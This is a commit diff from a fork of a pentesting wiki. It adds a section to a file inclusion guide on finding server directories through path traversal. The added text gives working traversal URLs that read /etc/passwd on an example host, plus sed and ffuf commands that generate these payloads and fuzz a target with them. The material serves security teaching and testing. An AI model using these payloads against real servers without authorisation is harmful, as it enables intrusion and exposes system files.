coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
paupaulaz 2022-11-23 17:52:53 +01:00 committed by GitHub
parent abb9bcb43f
commit 211fa80c12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
pentesting-web/file-inclusion/README.md
View File

@ -109,6 +109,35 @@ Maybe the back-end is checking the folder path:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Identifying folders on a server
Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
```
http://example.com/index.php?page=../../../etc/passwd # depth of 3
````
- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
```
http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd
```
- if the application is vulnerable, there might be two different outcomes to the request:
- if you get an error / no output, the `private` folder does not exist at this location
- if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
```
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
```
$ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
$ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
```
Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
### **Path truncation**
Bypass the append of more chars at the end of the provided string (bypass of: $\_GET\['param']."php")